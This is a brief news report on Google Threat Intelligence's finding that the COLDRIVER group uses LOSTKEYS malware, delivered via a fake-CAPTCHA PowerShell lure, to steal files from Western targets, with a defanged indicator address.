COLDRIVER using new malware to steal from Western targets — Google
The malware, LOSTKEYS, can steal files from hard-coded extensions and directories, according to Google.
Threat group COLDRIVER is using new malware to steal documents from Western targets, according to a May 7 report from Google Threat Intelligence. The malware, called LOSTKEYS, shows the evolution of the group from credential phishing to more sophisticated attacks.
According to the Google report, the new malware is installed through four steps. The process involves a “lure website” with a fake CAPTCHA, a PowerShell script downloaded to the user’s clipboard, some device evasion, and retrieval of the final payload. Lastly, the malware is installed.
LOSTKEYS is capable of stealing files from extensions and directories. It can also send system information and running processes back to COLDRIVER. The address from which the parts of the attack come is “165.227.148[.]68” according to Google.
English
Spanish
French
German
Arabic
Chinese (Simplified)
Russian
Portuguese
Indonesian
Dutch
Afrikaans
Italian
Vietnamese
Bulgarian
Croatian
Danish
Greek
Hebrew
Hindi
Hungarian
Irish
Japanese
Korean
Norwegian
Persian
Polish
Romanian
Somali
Swedish
Thai